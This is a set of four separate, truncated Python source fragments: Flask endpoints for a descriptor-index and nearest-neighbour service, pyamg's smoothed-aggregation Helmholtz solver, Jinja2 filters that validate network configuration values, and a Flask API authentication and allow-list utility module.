view_func=self.refine,
methods=['POST'])
self.add_url_rule('/num_results',
view_func=self.num_results,
methods=['GET'])
self.add_url_rule('/get_results',
view_func=self.get_results,
methods=['GET'])
self.add_url_rule('/classify',
view_func=self.classify,
methods=['GET'])
self.add_url_rule('/state',
view_func=self.get_iqr_state,
methods=['GET'])
self.add_url_rule('/state',
view_func=self.set_iqr_state,
methods=['PUT'])
def describe_base64_data(self, b64, content_type):
"""
Compute and return the descriptor element for the given base64 data.
The given data bytes are not retained.
:param b64: Base64 data string.
:type b64: str
:param content_type: Data content type.
:type content_type: str
:raises TypeError: Failed to parse base64 data.
:return: Computed descriptor element.
:rtype: smqtk.representation.DescriptorElement
"""
de = DataMemoryElement.from_base64(b64, content_type)
return self.descriptor_generator.compute_descriptor(
de, self.descriptor_factory
)
# GET /is_ready
# noinspection PyMethodMayBeStatic
def is_ready(self):
"""
Simple function that returns True, indicating that the server is
active.
"""
return make_response_json("Yes, I'm alive."), 200
# POST /add_descriptor_from_data
def add_descriptor_from_data(self):
"""
Add the description of the given base64 data with content type to the
descriptor set.
Accept base64 data (with content type), describe it via the configured
descriptor generator and add the resulting descriptor element to the
configured descriptor index.
Form Arguments:
data_b64
Base64-encoded input binary data to describe via
DescriptorGenerator. This must be of a content type accepted
by the configured DescriptorGenerator.
content_type
Input data content mimetype string.
JSON return object:
uid
UID of the descriptor element generated from input data
description. This should be equivalent to the SHA1 checksum of
the input data.
size
New size (integer) of the descriptor set that has been updated
(NOT the same as the nearest-neighbor index).
"""
data_b64 = flask.request.form.get('data_b64', None)
content_type = flask.request.form.get('content_type', None)
if not data_b64:
return make_response_json("No or empty base64 data provided."), 400
if not content_type:
return make_response_json("No data mimetype provided."), 400
try:
descriptor = self.describe_base64_data(data_b64, content_type)
except (TypeError, binascii.Error) as e:
if str(e) == "Incorrect padding":
return make_response_json("Failed to parse base64 data."), 400
# In case some other exception is raised, actually a server error.
raise
# Concurrent updating of descriptor set should be handled by underlying
# implementation.
self.descriptor_index.add_descriptor(descriptor)
return make_response_json("Success",
uid=descriptor.uuid(),
size=self.descriptor_index.count()), 201
# GET /nn_index
def get_nn_index_status(self):
"""
Get status/state information about the nearest-neighbor index.
Status code 200 on success, JSON return object: {
...,
// Size of the nearest-neighbor index.
index_size=<int>
}
"""
with self.neighbor_index_lock:
return (
make_response_json("Success",
index_size=self.neighbor_index.count()),
200
)
# POST /nn_index
def update_nn_index(self):
"""
Tell the configured nearest-neighbor-index instance to update with the
descriptors associated with the provided list of UIDs.
This is a critical operation on the index so this method can only be
invoked once at a time (other concurrent will block until previous
calls have finished).
Form Arguments:
descriptor_uids
JSON list of UID strings. If one or more UIDs do not match
descriptors in our current descriptor-set we return an error
message.
JSON return object:
message
Success string
descriptor_uids
List of UIDs the neighbor index was updated with. This should
be congruent with the list provided.
index_size
New size of the nearest-neighbors index.
"""
descr_uid_str = flask.request.form.get('descriptor_uids', None)
if not descr_uid_str: # empty string or None
return make_response_json("No descriptor UID JSON provided."), 400
# Load and check JSON input.
try:
descr_uid_list = parse_hashable_json_list(descr_uid_str)
except ValueError as ex:
return make_response_json("%s" % str(ex)), 400
with self.neighbor_index_lock:
try:
# | |
"""Support for aggregation-based AMG"""
__docformat__ = "restructuredtext en"
import numpy
import scipy
from scipy.sparse import isspmatrix_csr, isspmatrix_bsr
from pyamg.multilevel import multilevel_solver
from pyamg.util.utils import relaxation_as_linear_operator
from pyamg.relaxation.smoothing import change_smoothers
from pyamg.strength import symmetric_strength_of_connection, evolution_strength_of_connection, \
distance_strength_of_connection
from pyamg.aggregation.aggregation import extend_hierarchy, preprocess_Bimprove, \
preprocess_str_or_agg, preprocess_smooth
from pyamg.aggregation.aggregate import standard_aggregation, lloyd_aggregation
from pyamg.aggregation.tentative import fit_candidates
from pyamg.aggregation.smooth import jacobi_prolongation_smoother, \
richardson_prolongation_smoother, energy_prolongation_smoother
__all__ = ['smoothed_aggregation_helmholtz_solver', 'planewaves']
def planewaves(X, Y, omega=1.0, angles=[0.0]):
"""
Generate plane waves for use in SA applied to Helmholtz problems
Parameters
----------
X,Y : {array}
Coordinate vectors
omega : {float}
Helmholtz wave number, Laplace(u) + omega^2 u = f
angles : {list}
List of angles in [0, 2 pi] from which to generate planewaves
Returns
-------
Array of planewaves
"""
L = 2*len(angles)
dimen = max(X.shape)
W = numpy.zeros((L, dimen),dtype=complex)
if L == 0:
W = W.T.copy()
return W
X = numpy.ravel(X)
Y = numpy.ravel(Y)
#Set other columns to plane waves
counter = 0
for angle in angles:
K = (omega*numpy.cos(angle), omega*numpy.sin(angle))
wave = numpy.exp(0 + 1.0j*K[0]*X + 1.0j*K[1]*Y)
W[counter,:] = numpy.real(wave)
W[counter+1,:] = numpy.imag(wave)
counter += 2
# write W row-wise for efficiency
W = W.T.copy()
return W
def preprocess_planewaves(planewaves, max_levels):
# Helper function for smoothed_aggregation_solver.
# Will extend planewaves to a length max_levels list, repeating
# the final element of planewaves if necessary.
if planewaves == None:
planewaves = [None]
if not isinstance(planewaves, list):
raise ValueError("planewaves must be a list")
elif len(planewaves) < max_levels:
planewaves.extend([planewaves[-1] for i in range(max_levels-len(planewaves)) ])
return planewaves
def unpack_arg(v):
if isinstance(v,tuple):
return v[0],v[1]
else:
return v,{}
def smoothed_aggregation_helmholtz_solver(A, planewaves, use_constant=(True, {'last_level':0}),
symmetry='symmetric', strength='symmetric', aggregate='standard',
smooth=('energy', {'krylov': 'gmres'}),
presmoother=('gauss_seidel_nr',{'sweep':'symmetric'}),
postsmoother=('gauss_seidel_nr',{'sweep':'symmetric'}),
Bimprove='default', max_levels = 10, max_coarse = 100, **kwargs):
"""
Create a multilevel solver using Smoothed Aggregation (SA) for a 2D Helmholtz operator
Parameters
----------
A : {csr_matrix, bsr_matrix}
Sparse NxN matrix in CSR or BSR format
planewaves : { list }
[pw_0, pw_1, ..., pw_n], where the k-th tuple pw_k is of the form (fn,
args). fn is a callable and args is a dictionary of arguments for fn.
This k-th tuple is used to define any new planewaves (i.e., new coarse
grid basis functions) to be appended to the existing B_k at that level.
The function fn must return functions defined on the finest level,
i.e., a collection of vector(s) of length A.shape[0]. These vectors
are then restricted to the appropriate level, where they enrich the
coarse space.
Instead of a tuple, None can be used to stipulate no introduction
of planewaves at that level. If len(planewaves) < max_levels, the
last entry is used to define coarser level planewaves.
use_constant : {tuple}
Tuple of the form (bool, {'last_level':int}). The boolean denotes
whether to introduce the constant in B at level 0. 'last_level' denotes
the final level to use the constant in B. That is, if 'last_level' is 1,
then the vector in B corresponding to the constant on level 0 is dropped
from B at level 2.
This is important, because using constant based interpolation beyond
the Nyquist rate will result in poor solver performance.
symmetry : {string}
'symmetric' refers to both real and complex symmetric
'hermitian' refers to both complex Hermitian and real Hermitian
'nonsymmetric' i.e. nonsymmetric in a hermitian sense
Note that for the strictly real case, symmetric and hermitian are the same
Note that this flag does not denote definiteness of the operator.
strength : ['symmetric', 'classical', 'evolution', ('predefined', {'C' : csr_matrix}), None]
Method used to determine the strength of connection between unknowns of
the linear system. Method-specific parameters may be passed in using a
tuple, e.g. strength=('symmetric',{'theta' : 0.25 }). If strength=None,
all nonzero entries of the matrix are considered strong.
See notes below for varying this parameter on a per level basis. Also,
see notes below for using a predefined strength matrix on each level.
aggregate : ['standard', 'lloyd', 'naive', ('predefined', {'AggOp' : csr_matrix})]
Method used to aggregate nodes. See notes below for varying this
parameter on a per level basis. Also, see notes below for using a
predefined aggregation on each level.
smooth : ['jacobi', 'richardson', 'energy', None]
Method used to smooth the tentative prolongator. Method-specific
parameters may be passed in using a tuple, e.g. smooth=
('jacobi',{'filter' : True }). See notes below for varying this
parameter on a per level basis.
presmoother : {tuple, string, list} : default ('block_gauss_seidel', {'sweep':'symmetric'})
Defines the presmoother for the multilevel cycling. The default block
Gauss-Seidel option defaults to point-wise Gauss-Seidel, if the matrix
is CSR or is a BSR matrix with blocksize of 1. See notes below for
varying this parameter on a per level basis.
postsmoother : {tuple, string, list}
Same as presmoother, except defines the postsmoother.
Bimprove : {list} : default [('block_gauss_seidel', {'sweep':'symmetric'}), None]
The ith entry defines the method used to improve the candidates B on
level i. If the list is shorter than max_levels, then the last entry
will define the method for all levels lower.
The list elements are relaxation descriptors of the form used for
presmoother and postsmoother. A value of None implies no action on B.
max_levels : {integer} : default 10
Maximum number of levels to be used in the multilevel solver.
max_coarse : {integer} : default 500
Maximum number of variables permitted on the coarse grid.
Other Parameters
----------------
coarse_solver : ['splu','lu', ... ]
Solver used at the coarsest level of the MG hierarchy
Returns
-------
ml : multilevel_solver
Multigrid hierarchy of matrices and prolongation operators
See Also
--------
multilevel_solver, smoothed_aggregation_solver
Notes
-----
- The additional parameters are passed through as arguments to
multilevel_solver. Refer to pyamg.multilevel_solver for additional
documentation.
- The parameters smooth, strength, aggregate, presmoother, postsmoother can
be varied on a per level basis. For different methods on different
levels, use a list as input so that the ith entry defines the method at
the ith level. If there are more levels in the hierarchy than list
entries, the last entry will define the method for all levels lower.
Examples are:
smooth=[('jacobi', {'omega':1.0}), None, 'jacobi']
presmoother=[('block_gauss_seidel', {'sweep':symmetric}), 'sor']
aggregate=['standard', 'naive']
strength=[('symmetric', {'theta':0.25}), ('symmetric',{'theta':0.08})]
- Predefined strength of connection and aggregation schemes can be
specified. These options are best used together, but aggregation can be
predefined while strength of connection is not.
For predefined strength of connection, use a list consisting of tuples of
the form ('predefined', {'C' : C0}), where C0 is a csr_matrix and each
degree-of-freedom in C0 represents a supernode. For instance to
predefine a three-level hierarchy, use [('predefined', {'C' : C0}),
('predefined', {'C' : C1}) ].
Similarly for predefined aggregation, use a list of tuples. For instance
to predefine a three-level hierarchy, use [('predefined', {'AggOp' :
Agg0}), ('predefined', {'AggOp' : Agg1}) ], where the dimensions of A,
Agg0 and Agg1 are compatible, i.e. Agg0.shape[1] == A.shape[0] and
Agg1.shape[1] == Agg0.shape[0]. Each AggOp is a csr_matrix.
Examples
--------
>>> from pyamg import smoothed_aggregation_helmholtz_solver, poisson
>>> from scipy.sparse.linalg import cg
>>> from scipy import rand
>>> A = poisson((100,100), format='csr') # matrix
>>> b = rand(A.shape[0]) # random RHS
>>> ml = smoothed_aggregation_solver(A) # AMG solver
>>> M = ml.aspreconditioner(cycle='V') # preconditioner
>>> x,info = cg(A, b, tol=1e-8, maxiter=30, M=M) # solve with CG
References
----------
.. [1] <NAME> and <NAME>. Smoothed Aggregation for Helmholtz
Problems. Numerical Linear Algebra with Applications. pp. 361--386. 17
(2010).
"""
if not (isspmatrix_csr(A) or isspmatrix_bsr(A)):
raise TypeError('argument A must have type csr_matrix or bsr_matrix')
A = A.asfptype()
if (symmetry != 'symmetric') and (symmetry != 'hermitian') and (symmetry != 'nonsymmetric'):
raise ValueError('expected \'symmetric\', \'nonsymmetric\' or \'hermitian\' for the symmetry parameter ')
A.symmetry = symmetry
if A.shape[0] != A.shape[1]:
raise ValueError('expected square matrix')
##
# Preprocess and extend planewaves to length max_levels
planewaves = preprocess_planewaves(planewaves, max_levels)
# Check that the user has defined functions for B at | |
"""
Custom Jinja2 template filters
"""
import re
import logging
import ipaddresstools as ipv4
J2_FILTER_LOGGER = logging.getLogger('qct_template_filter')
def filter_check_u_ip_address(value):
"""Function to check for a unicast ipv4 address in a template
:type value: String
:param value: Value to check if it is a IPv4 Unicast address
:rtype: String
:returns: value, or an error
"""
error = f'{value} !!!! possible error this is required to be a unicast ipv4 address !!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_u_ip_address %s', error)
return error
elif ipv4.ucast_ip(value, return_tuple=False):
return value
else:
J2_FILTER_LOGGER.info('filter_check_u_ip_address %s', error)
return error
def filter_check_subnet(value):
"""Function to check for a subnet and mask combo in a template
:type value: String
:param value: Value to check if it is a IPv4 Subnet in CIDR format
:rtype: String
:returns: The value or an error
"""
error = f'{value} !!!! possible error this is required to be a ipv4 subnet !!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_subnet %s', error)
return error
elif ipv4.ip_mask(value, return_tuple=False):
return value
else:
J2_FILTER_LOGGER.info('filter_check_subnet %s', error)
return error
def filter_check_ip_mask_cidr(value):
"""Function to check to a CIDR mask number in a template
:type value: String
:param value: The value to check if it is a CIDR value
:rtype: String
:return: The value or an error
"""
error = f'{value} !!!! possible error this is required to be a ipv4 subnet mask in CIDR!!!!'
if not value:
J2_FILTER_LOGGER.info('filter_check_ip_mask_cidr %s', error)
return error
try:
if ipv4.mask_conversion.get(int(value)): # pylint: disable=no-else-return
return value
else:
return error
except ValueError as e: # pylint: disable=invalid-name # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_check_ip_mask_cidr %s %s', error, e)
return error
def filter_check_ip_mask_standard(value): # pylint: disable=inconsistent-return-statements
"""
Function to check for a standard mask in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error this is required to be a ipv4 standard subnet mask!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_ip_mask_standard %s', error)
return error
else:
not_found = False
for key in ipv4.mask_conversion:
if ipv4.mask_conversion.get(key).get('MASK') == value: # pylint: disable=no-else-return
return value
else:
not_found = True
if not_found:
J2_FILTER_LOGGER.info('filter_check_ip_mask_standard %s', error)
return error
def filter_check_vlan_number(value):
"""
Function to check for a good VLAN number in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error the VLAN# should be between 1 and 4096!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_vlan_number %s', error)
return error
else:
try:
if int(value) not in range(1, 4097): # pylint: disable=no-else-return
return error
else:
return value
except ValueError as e: # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_check_vlan_number %s, caught %s', error, e)
return error
def filter_check_vni_number(value):
"""
Function to check for a good VNI number in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error the VNI# should be between 1 and 16777214!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_vni_number %s', error)
return error
else:
try:
if int(value) not in range(1, 16777215): # pylint: disable=no-else-return
return error
else:
return value
except ValueError as e: # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_check_vni_number %s, caught %s', error, e)
return error
def filter_check_ip_inverse_mask_standard(value): # pylint: disable=inconsistent-return-statements
"""
Function to check for a inverse mask in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error this is required to be a ipv4 inverse subnet mask!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_ip_inverse_mask_standard %s', error)
return error
else:
not_found = False
for key in ipv4.mask_conversion:
if ipv4.mask_conversion.get(key).get('INVMASK') == value: # pylint: disable=no-else-return
return value
else:
not_found = True
if not_found:
J2_FILTER_LOGGER.info('filter_check_ip_inverse_mask_standard %s', error)
return error
def filter_check_m_ip_address(value):
"""
Function to check for a multicast ipv4 address in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error this is required to be a multicast ipv4 address !!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_m_ip_address %s', error)
return error
elif ipv4.mcast_ip(value, return_tuple=False):
return value
else:
J2_FILTER_LOGGER.info('filter_check_m_ip_address %s', error)
return error
def filter_check_as_number(value):
"""
Function to check for a good BGP AS, EIGRP AS, OSPF Process in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error the AS# should be between 1 and 65535!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_as_number %s', error)
return error
else:
try:
if int(value) not in range(1, 65536): # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_as_number %s', error)
return error
else:
return value
except ValueError as e: # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_check_as_number %s, caught %s', error, e)
return error
def filter_check_required(value):
"""
Function to check for a required value in a template
:param value:
:return:
"""
error = f'{value} !!!! This is a required value!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_required %s', error)
return error
else:
return value
def filter_check_community(value):
"""
Function to check for a community in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error the community should be in this format XXX:XXX!!!!'
regex_community = re.compile(r'^[0-9]+:[0-9]+$')
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_community %s', error)
return error
elif not regex_community.match(str(value)):
J2_FILTER_LOGGER.info('filter_check_community %s', error)
return error
else:
return value
def filter_check_mac_address(value):
"""
Function to check for a mac-address in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error the mac-address should be in this format ' \
f'xxxx.xxxx.xxxx, and only contain 0-9 or a-f!!!!'
regex_mac = re.compile(r'^([0-9]|[a-f]){4}\.([0-9]|[a-f]){4}\.([0-9]|[a-f]){4}$', re.IGNORECASE)
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_mac_address %s', error)
return error
elif not regex_mac.match(str(value)):
J2_FILTER_LOGGER.info('filter_check_mac_address %s', error)
return error
else:
return value
def filter_check_permit_or_deny(value):
"""
Function to check for permit, or deny in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error should be permit or deny!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_permit_or_deny %s', error)
return error
elif value not in ('permit', 'deny'):
J2_FILTER_LOGGER.info('filter_check_permit_or_deny %s', error)
return error
else:
return value
def filter_check_inside_or_outside(value):
"""
Function to check for inside, or outside in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error should be inside or outside!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_inside_or_outside %s', error)
return error
elif value not in ('inside', 'outside'):
J2_FILTER_LOGGER.info('filter_check_inside_or_outside %s', error)
return error
else:
return value
def filter_check_number(value): # pylint: disable=inconsistent-return-statements
"""
Function to check for any number in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error this should be any number!!!!'
if not value:
J2_FILTER_LOGGER.info('filter_check_number %s', error)
return error
try:
if isinstance(int(value), int):
return value
except ValueError as e: # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_check_number %s, caught %s', error, e)
return error
def filter_check_route_map_match_items(value):
"""
Function to check route-map match options in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error check template for possible match items!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_route_map_match_items %s', error)
return error
elif value not in ('ip address prefix-list', 'as-path', 'ip address', 'community', 'extcommunity',
'ip multicast group'):
J2_FILTER_LOGGER.info('filter_check_route_map_match_items %s', error)
return error
else:
return value
def filter_check_route_map_set_items(value):
"""
Function to check route-map set options in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error check template for possible set items!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_route_map_set_items %s', error)
return error
elif value not in ('local-preference', 'weight', 'community', 'as-path prepend', 'as-path prepend last-as'):
J2_FILTER_LOGGER.info('filter_check_route_map_set_items %s', error)
return error
else:
return value
def filter_check_protocol_port_number(value):
"""
Function to check for a good protocol port number in a template
:param value:
:return:
"""
error = f'{value} !!!! possible error should be between 0 and 65535!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_protocol_port_number %s', error)
return error
else:
try:
if int(value) not in range(0, 65536): # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_check_protocol_port_number %s', error)
return error
else:
return value
except ValueError as e: # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_check_protocol_port_number %s, caught %s', error, e)
return error
def filter_calculate_neighbor_ip_mask_30(value):
"""
Function to calculate a neighbors IP using a 30 bit mask
:param value:
:return: An error, or a IP address
"""
error = f'{value} !!!! possible error should be a valid ipv4 address!!!!'
if not value: # pylint: disable=no-else-return
J2_FILTER_LOGGER.info('filter_calculate_neighbor_ip_mask_30 %s', error)
return error
else:
try:
if ipv4.ip(value, return_tuple=False): # pylint: disable=no-else-return
this_ip, nei_ip = ipv4.get_neighbor_ip(value, '30') # pylint: disable=unused-variable
return nei_ip
else:
J2_FILTER_LOGGER.info('filter_calculate_neighbor_ip_mask_30 %s', error)
return error
except ValueError as e: # pylint: disable=invalid-name
J2_FILTER_LOGGER.info('filter_calculate_neighbor_ip_mask_30 %s, caught %s', error, e)
return error
def filter_calculate_neighbor_ip_mask_31(value):
"""
Function to calculate | |
import calendar
import datetime
import email.utils
import flask
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
import logging
from requests.exceptions import RequestException
from time import sleep
from typing import Callable, Collection
import urllib.parse
import netaddr
import pytz
import requests
from flask import request
from werkzeug.exceptions import Forbidden, Unauthorized, GatewayTimeout
from rdr_service import clock, config
from rdr_service.api import base_api
from rdr_service.config import GAE_PROJECT
_GMT = pytz.timezone("GMT")
SCOPE = "https://www.googleapis.com/auth/userinfo.email"
GLOBAL_CLIENT_ID_KEY = 'oauth_client_id'
def handle_database_disconnect(err):
"""Intended to catch DBAPIError's thrown during a request cycle and transform them into 503's.
If the DBAPIError does not represent an invalidated connection, reraise the error.
Usage: app.register_error_handler(DBAPIError, handle_database_disconnect)
"""
if err.connection_invalidated:
return "DB connection lost, please retry", 503
raise err
def auth_required_cron(func):
"""A decorator that ensures that the user is a cron job."""
def wrapped(*args, **kwargs):
check_cron()
return func(*args, **kwargs)
return wrapped
def task_auth_required(func):
"""A decorator that ensures that the user is a task job."""
def wrapped(*args, **kwargs):
if GAE_PROJECT == "localhost" or (
request.headers.get("X-Appengine-Taskname") and "AppEngine-Google" in request.headers.get("User-Agent", "")
):
logging.info("App Engine task request ALLOWED for task endpoint.")
return func(*args, **kwargs)
logging.info("User {} NOT ALLOWED for task endpoint".format(get_oauth_id()))
raise Forbidden()
return wrapped
def nonprod(func):
"""The decorated function may never run in environments without config.ALLOW_NONPROD_REQUESTS."""
def wrapped(*args, **kwargs):
if not config.getSettingJson(config.ALLOW_NONPROD_REQUESTS, False):
raise Forbidden("Request not allowed in production environment (according to config).")
return func(*args, **kwargs)
return wrapped
def check_auth(role_allowed_list):
"""Raises Unauthorized or Forbidden if the current user is not allowed."""
user_email, user_info = get_validated_user_info()
if set(user_info.get("roles", [])) & set(role_allowed_list):
return
logging.warning(f"User {user_email} has roles {user_info.get('roles')}, but {role_allowed_list} is required")
raise Forbidden()
def get_auth_token():
header = request.headers.get("Authorization", '')
try:
return header.split(' ', 1)[1]
except IndexError:
raise ValueError(f"Invalid Authorization Header: {header}")
def get_token_info_response(token, use_tokeninfo=False):
verification_endpoint = 'userinfo'
if use_tokeninfo:
verification_endpoint = 'tokeninfo'
google_tokeninfo_url = 'https://www.googleapis.com/oauth2/v3/' + verification_endpoint
qargs = urllib.parse.urlencode({'access_token': token})
response = requests.get(f"{google_tokeninfo_url}?{qargs}")
return response
def get_oauth_id():
"""Returns user email ID if OAUTH token present, or None."""
'''
NOTES: 2019-08-15 by tanner and mikey
currently verifies that the provided token
is legitimate via google API.
- performance
- could be validated locally instead of with API
'''
if flask.g and GLOBAL_CLIENT_ID_KEY in flask.g:
return getattr(flask.g, GLOBAL_CLIENT_ID_KEY)
retries = 5
use_tokeninfo_endpoint = False
while retries:
retries -= 1
if GAE_PROJECT == 'localhost': # NOTE: 2019-08-15 mimic devappserver.py behavior
return config.LOCAL_AUTH_USER
try:
token = get_auth_token()
except ValueError as e:
logging.info(f"Invalid Authorization Token: {e}")
return None
else:
try:
response = get_token_info_response(token, use_tokeninfo=use_tokeninfo_endpoint)
except RequestException as e: # Catching any connection or decoding errors that could be thrown
logging.warning(f'Error validating token: {e}')
else:
if response.status_code == 200:
data = response.json()
if use_tokeninfo_endpoint: # UserInfo doesn't return expiry info :(
token_expiry_seconds = data.get('expires_in')
logging.info(f'Token expiring in {token_expiry_seconds} seconds')
user_email = data.get('email')
if user_email is None:
logging.error('UserInfo endpoint did not return the email')
use_tokeninfo_endpoint = True
else:
if flask.g:
setattr(flask.g, GLOBAL_CLIENT_ID_KEY, user_email)
return user_email
else:
logging.info(f"Oauth failure: {response.content} (status: {response.status_code})")
if response.status_code in [400, 401]: # tokeninfo returns 400
raise Unauthorized
elif not use_tokeninfo_endpoint:
logging.error("UserInfo failed, falling back on Tokeninfo")
use_tokeninfo_endpoint = True
sleep(0.25)
logging.info('Retrying authentication call to Google after failure.')
raise GatewayTimeout('Google authentication services is not available, try again later.')
def check_cron():
"""Raises Forbidden if the current user is not a cron job."""
if request.headers.get("X-Appengine-Cron"):
logging.info("Appengine-Cron ALLOWED for cron endpoint.")
return
logging.info("User {} NOT ALLOWED for cron endpoint".format(get_oauth_id()))
raise Forbidden()
def lookup_user_info(user_email):
return config.getSettingJson(config.USER_INFO, {}).get(user_email)
def get_account_origin_id():
"""
Returns the clientId value set in the config for the user.
:return: Client Id
"""
auth_email = get_oauth_id()
user_info = lookup_user_info(auth_email)
client_id = user_info.get('clientId', None)
from rdr_service.api_util import DEV_MAIL
if not client_id:
if auth_email == DEV_MAIL:
# TODO: This is a hack because something sets up configs different
# when running all tests and it doesnt have the clientId key.
client_id = "example"
return client_id
def is_self_request():
return (
request.remote_addr is None
and config.getSettingJson(config.ALLOW_NONPROD_REQUESTS, False)
and not request.headers.get("unauthenticated")
)
def get_allowed_ips(user_info):
# double_check
allowed_ip_ranges = user_info.get("allow_list_ip_ranges") or user_info.get("whitelisted_ip_ranges")
if not allowed_ip_ranges:
return None
return [
netaddr.IPNetwork(rng)
for rng in allowed_ip_ranges.get("ip6", [])
+ allowed_ip_ranges.get("ip4", [])
]
def enforce_ip_allowed(request_ip, allowed_ips):
if not allowed_ips: # No allowed ips means "don't apply restrictions"
return
logging.info("IP RANGES ALLOWED: {}".format(allowed_ips))
ip = netaddr.IPAddress(request_ip)
if not bool([True for rng in allowed_ips if ip in rng]):
logging.info("IP {} NOT ALLOWED".format(ip))
raise Forbidden("Client IP not allowed: {}".format(ip))
logging.info("IP {} ALLOWED".format(ip))
def get_allowed_appids(user_info):
# double_check
allowed_app_ids = user_info.get("allow_list_appids") or user_info.get("whitelisted_appids")
return allowed_app_ids
def enforce_appid_allowed(request_app_id, allowed_appids):
if not allowed_appids: # No allowed_appids means "don't apply restrictions"
return
if request_app_id:
if request_app_id in allowed_appids:
logging.info("APP ID {} ALLOWED".format(request_app_id))
return
else:
logging.info("APP ID {} NOT FOUND IN {}".format(request_app_id, allowed_appids))
else:
logging.info("NO APP ID FOUND WHEN REQUIRED TO BE ONE OF: {}".format(allowed_appids))
raise Forbidden()
def add_headers(response):
"""Add uniform headers to all API responses.
All responses are JSON, so we tag them as such at the app level to provide uniform protection
against content-sniffing-based attacks.
"""
response.headers["Content-Disposition"] = 'attachment; filename="f.txt"'
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["Content-Type"] = "application/json; charset=utf-8" # override to add charset
response.headers["Date"] = email.utils.formatdate(
calendar.timegm(pytz.utc.localize(clock.CLOCK.now()).astimezone(_GMT).timetuple()), usegmt=True
)
response.headers["Pragma"] = "no-cache"
response.headers["Cache-control"] = "no-cache, must-revalidate"
# Expire at some date in the past: the epoch.
response.headers["Expires"] = email.utils.formatdate(0.0, usegmt=True)
return response
def request_logging():
"""Some uniform logging of request characteristics before any checks are applied."""
logging.info("Request protocol: HTTPS={}".format(request.environ.get("HTTPS")))
def auth_required(role_allowed_list):
"""A decorator that keeps the function from being called without auth.
role_allowed_list can be a string or list of strings specifying one or
more roles that are allowed to call the function. """
if not role_allowed_list:
raise AssertionError("Can't call auth_required with empty role_allowed_list.")
if not isinstance(role_allowed_list, list):
role_allowed_list = [role_allowed_list]
def auth_required_wrapper(func):
def wrapped(*args, **kwargs):
appid = GAE_PROJECT
request.log_record = base_api.log_api_request()
# Only enforce HTTPS and auth for external requests; requests made for data generation
# are allowed through (when enabled).
acceptable_hosts = ("None", "testbed-test", "testapp", "localhost", "127.0.0.1")
# logging.info(str(request.headers))
if not is_self_request():
if request.scheme.lower() != "https" and appid not in acceptable_hosts:
raise Unauthorized(f"HTTPS is required for {appid}", www_authenticate='Bearer realm="rdr"')
check_auth(role_allowed_list)
request.logged = False
result = func(*args, **kwargs)
if request.logged is False:
try:
base_api.log_api_request(log=request.log_record)
except RuntimeError:
# Unittests don't always setup a valid flask request context.
pass
return result
return wrapped
return auth_required_wrapper
def restrict_to_gae_project(allowed_project_list):
"""
A decorator for restricting access of a method
to a particular Google App Engine Project
:param project_list: list of GAE ids, i.e. 'all-of-us-rdr-stable', etc.
:return: function result or Forbidden
"""
def restriction_function_wrapper(func):
def inner(*args, **kwargs):
app_id = GAE_PROJECT
# Check app_id against the registered environments
if app_id in allowed_project_list:
result = func(*args, **kwargs)
else:
raise Forbidden(f'This operation is forbidden on {app_id}')
return result
return inner
return restriction_function_wrapper
def get_validated_user_info():
"""Returns a valid (user email, user info), or raises Unauthorized or Forbidden."""
user_email = get_oauth_id()
# Allow clients to simulate an unauthentiated request (for testing)
# because we haven't found another way to create an unauthenticated request
# when using dev_appserver. When client tests are checking to ensure that an
# unauthenticated requests gets rejected, they helpfully add this header.
# The `application_id` check ensures this feature only works in dev_appserver.
if request.headers.get("unauthenticated") and GAE_PROJECT == 'localhost':
user_email = None
if user_email is None:
raise Unauthorized("No OAuth user found.")
user_info = lookup_user_info(user_email)
if user_info:
if 'X-Appengine-User-Ip' in request.headers:
addr = request.headers.get('X-Appengine-User-Ip')
else:
addr = request.remote_addr
enforce_ip_allowed(addr, get_allowed_ips(user_info))
enforce_appid_allowed(request.headers.get("X-Appengine-Inbound-Appid"), get_allowed_appids(user_info))
logging.info(f"User {user_email} ALLOWED")
return (user_email, user_info)
logging.info(f"User {user_email} NOT ALLOWED")
raise Forbidden()
class ObjectView(object):
"""access dict attributes as an object"""
def __init__(self, d):
self.__dict__ = d
class ObjDict(dict):
